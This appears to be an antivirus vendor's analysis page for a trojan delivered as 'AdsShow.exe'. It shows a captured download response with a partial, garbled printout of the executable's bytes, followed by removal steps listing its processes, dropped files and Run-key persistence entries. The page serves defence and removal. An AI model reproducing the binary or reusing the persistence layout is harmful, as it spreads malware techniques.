Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Content-Length: 7680
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownloadMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...7.{Y
.........."...0..............1... ...@....@.. ........................
............@.................................81..O....@..(...........
.........`.......0............................................... ....
........... ..H............text........ ...................... ..`.rsr
c...(....@......................@..@.reloc.......`....................
..@..B................l1......H........!..\...........H/..............
.................................0..........s.......,H~....r...p.o....
%(....r]..pra..po....rc..p(....o....rc..p(....o....o....rg..p(.....-4.
.,. `......o....Z(...... .. ....&&..X.. ....2.(.... `.......o....Z(...
. .&..*....................0..\......... .. ....&&.. ...X.. ....2...X.
. ....2.rw..p( ...&.. .. ....&&.. ...X.. ....2...X.. ....2.*..(!...*.~
....-.r...p.....("...o#...s$........~....*.~....*.......*.~....*..(%..
.*Vs....(&...t.........*BSJB............v2.0.50727......l.......#~..x.
..|...#Strings........<...#US.0.......#GUID...@.......#Blob........
...W..........3........$...................&..........................
.....................Z.W.....W.....%...............=.................z
...................8...L.8...........\.....\...c.\.....\...Z.....q.%..
.1.W.....w...........>.....>.........q.....G.....,.....%.\...h..
.....%...-.......\...Y.\.........................T...=.........1...=..
.......~...=.............i.......j...........I...P ......v......!.<<< skipped >>>
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:1692
Sho9libi.exe:1764
OneTwo.exe:2320
%original file name%.exe:3424
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
%Program Files%\KRH6BP3WSZ\uninstaller.exe.config (1 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe (124075 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe (17797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe (1117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe (230392 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe.config (1 bytes)
%Program Files%\KRH6BP3WSZ\cast.config (37 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_R2ZKP" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HDURM51XOVAKJHF" = "%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4ffk2bt3ky1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.